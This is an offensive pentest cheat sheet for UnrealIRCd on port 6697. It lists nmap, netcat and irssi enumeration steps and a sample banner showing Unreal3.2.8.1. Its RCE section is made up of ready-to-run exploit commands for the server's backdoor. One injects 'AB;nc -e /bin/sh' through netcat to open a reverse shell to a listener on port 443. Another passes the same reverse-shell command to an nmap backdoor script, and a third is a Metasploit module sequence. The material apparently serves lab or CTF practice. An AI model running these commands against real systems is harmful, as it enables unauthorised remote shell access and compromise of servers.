6697 - UnrealIRCd

Information

Default Port: 6697

PORT     STATE SERVICE
6697/tcp open  ircs-u                                                        

Enumeration

nc -vn 192.168.1.2 6697
timeout 0.1 bash -c "nc -nv 192.168.1.2 6697"

nmap -p6697 -sS 192.168.1.2
nmap -p6697 -sVC 192.168.1.2
nmap -p6697 --script=irc-unrealircd-backdoor.nse 192.168.1.2

Version

irssi -c 192.168.1.2 --port 6697
irssi -c 192.168.1.2 --port 6667
irssi -c 192.168.1.2 --port 8067

 Irssi v1.4.5 - https://irssi.org                                                                                                                                                        
13:35 -!- Irssi: Looking up 192.168.1.89
13:35 -!- Irssi: The following settings were initialized
13:35                        real_name root
13:35                        user_name root
13:35                             nick root
13:35 -!- Irssi: Connecting to 192.168.1.89 [192.168.1.89] port 6697
13:35 Waiting for CAP LS response...
13:35 -!- Irssi: Connection to 192.168.1.89 established
13:35 !irc.foonet.com *** Looking up your hostname...
13:35 !irc.foonet.com *** Couldn't resolve your hostname; using your IP address instead
13:35 -!- Welcome to the ROXnet IRC Network root_!root@192.168.1.5
13:35 -!- Your host is irc.foonet.com, running version Unreal3.2.8.1
13:35 -!- This server was created Sat 08 Aug EDT at 2020 07:03:52 PM
13:35 -!- irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj

RCE

Netcat

nc -lvnp 443
echo "AB;nc -e /bin/sh 192.168.1.2 443" |nc 192.168.1.3 6697

Nmap

nc -lvnp 443
nmap -p6697 --script="irc-unrealircd-backdoor" --script-args=irc-unrealircd-backdoor.command="nc 192.168.1.2 443 -e /bin/sh" 192.168.1.3

Metasploit

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf > show options
msf > set RHOST 192.168.1.2
msf > exploit